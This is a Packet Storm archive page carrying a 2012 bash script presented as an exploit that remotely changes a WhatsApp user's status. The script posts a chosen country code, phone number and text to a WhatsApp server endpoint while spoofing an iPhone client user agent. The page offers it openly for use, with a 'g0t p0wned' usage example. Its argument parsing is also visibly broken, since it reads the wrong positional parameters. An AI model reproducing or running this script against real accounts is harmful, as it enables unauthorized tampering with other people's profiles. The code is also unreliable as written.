exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WhatsApp Status Changer 0.2 Stable

WhatsApp Status Changer 0.2 Stable
Posted Jan 20, 2012
Authored by Emanuele Gentili, Stefano Fratepietro

This is a slim exploit that will change the WhatsApp user status remotely.

tags | exploit
SHA-256 | 8f1798fb095f631b8c7bd66e9d6ce857746b6d417745cd1e813ce1524b09572d

WhatsApp Status Changer 0.2 Stable

Change Mirror Download
#!/bin/bash
#
# WhatsApp Status changer v0.2 stable
# A slim exploit able to change the WhatsApp
# user status in a remote way.
#
# This program is released under the terms of the GNU General Public License
# (GPL), which is distributed with this software in the file "COPYING".
# The GPL specifies the terms under which users may copy and use this software.
#

show_help(){
echo ""
echo " 2012 (C) WhatsApp-exp.sh - The Whats App Status Changer Exploit"
echo ""
echo " --usage show the exploit Usage"
echo " --credits show the exploit Credits"
echo " --help show the Help"
echo ""
echo " enJoy"
}

show_credits(){
echo ""
echo " Emanuele Gentili"
echo " http://www.emanuelegentili.eu"
echo " eg @ offensive-security.it"
echo ""
echo " Stefano Fratepietro"
echo " http://steve.deftlinux.net"
echo " stefano @ deftlinux.net"
echo ""

}

show_usage(){
echo ""
echo " 2012 (C) WhatsApp-exp.sh - The Whats App Status Changer Exploit"
echo ""
echo " usage $0 --countrycode 39 --mobilenum 3931212343 --text g0t p0wned"
echo ""
echo " enJoy"
}


# Bash
while [[ $# != 0 ]]; do
arg_name=$1; shift
case "$arg_name" in
--help|-?|-h) show_help; exit 0;;
--credits) show_credits; exit 0;;
--usage) show_usage; exit 0;;
--countrycode) countrycode=$1; shift;;
--mobilenum) mobilenum=$2; shift;;
--text) text=$3; shift;;
*) echo "invalid option: $1"; show_help;exit 1;;
esac
done

[ -z "$countrycode" ] && { show_help; exit 1; }

whatsAppagent="WhatsApp/2.6.7 iPhone_OS/5.0.1 Device/Unknown_(iPhone4,1)"

wget --no-cache --delete-after --quiet --no-check-certificate --user-agent="$whatsAppagent" --post-data="cc=$countrycode&me=$mobilenum&s=$text" https://s.whatsapp.net/client/iphone/u.php

echo ""
echo "[+] Operazione completata."
echo ""

Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    0 Files
  • 3
    May 3rd
    0 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    0 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close